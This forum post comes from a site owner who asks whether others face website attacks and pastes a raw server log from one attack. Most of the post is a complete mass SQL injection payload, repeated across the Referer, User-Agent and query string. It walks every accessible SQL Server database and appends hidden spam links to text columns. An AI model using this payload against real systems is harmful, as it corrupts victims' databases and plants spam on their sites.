Thread: Are anyone else's websites under attack?
View Single Post
motion motion is offline
Registered
 
motion's Avatar
 
Join Date: Apr 2000
Location: Mid-life crisis, could be anywhere
Posts: 10,382
Appreciate the responses. I guess I'm not the only one, which makes ma feel a lot better. Wonder if this situation will get better or worse over time? Seems ridiculous to me.

FWIW, here is a report on one of the attacks from yesterday (one of thousands). I have no idea what this means, but just throwing it out there. I do see "cialis" in the Query String, so I'm assuming its an attempted server hijack for mass spam emailing.

HTTP_ACCEPT:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_ENCODING:gzip,deflate,gzip, deflate HTTP_HOST:xxxxxxxx.com HTTP_REFERER:http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- HTTP_USER_AGENT:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

ALL_RAW Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,gzip, deflate Host: xxxxxxxx.com Referer: http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

QUERY_STRING minprice=&maxprice=&bedrrom=&sqft=;declare%20@b%20cursor;declare%20@s%20varchar (8000);declare%20@w%20varchar(99);set%20@b=cursor% 20for%20select%20DB_NAME()%20union%20select%20name %20from%20sys.databases%20where%20(has_dbaccess(na me)!=0)%20and%20name%20not%20in%20('master','tempd b','model','msdb',DB_NAME());open%20@b;fetch%20nex t%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0 %20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B ';declare%20@c%20cursor;declare%20@d%20varchar(400 0);set%20@c=cursor%20for%20select%20''update%20%5B ''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAM E%2B''%5D=%5B''%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS (CHECKSUM(NewId()))%2510%20when%200%20then%20''''' '%2Bchar(60)%2B''div%20style=%22display:none%22''% 2Bchar(62)%2B''cialis%20coupon%20''%2Bchar(60)%2B' 'a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''www .cartoninjas.net''%2Bchar(47)%2B''page''%2Bchar(47 )%2B''Drug-Prescription-Card%22%20rel=%22nofollow%22''%2Bchar(62)%2B'''''' %2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20 then%20''''cialis%20coupon''''%20when%201%20then%2 0''''cialis%20coupon''''%20else%20''''cialis%20cou pon''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B ''a''%2Bchar(62)%2B''%20cialis%20coupon''%2Bchar(6 0)%2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else %20''''''''%20end''%20FROM%20sysindexes%20AS%20i%2 0INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o. id%20INNER%20JOIN%20INFORMATION_SCHEMA.COLUMNS%20O N%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))% 20and%20DATA_TYPE%20like%20''%25varchar''%20and(CH ARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d ;while%20@@FETCH_STATUS=0%20begin%20exec%20(@d);fe tch%20next%20from%20@c%20into%20@d;end;close%20@c% 20end%20try%20begin%20catch%20end%20catch';exec%20 (@s);fetch%20next%20from%20@b%20into%20@w;end;clos e%20@b--&city=

HTTP_REFERER http://google.com;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--

HTTP_USER_AGENT Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then '''''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
__________________
'95 993 C4 Cabriolet
Bunch of motorcycles
Old 06-23-2016, 09:09 AM
  Pelican Parts Catalog | Tech Articles | Promos & Specials    Reply With Quote #15 (permalink)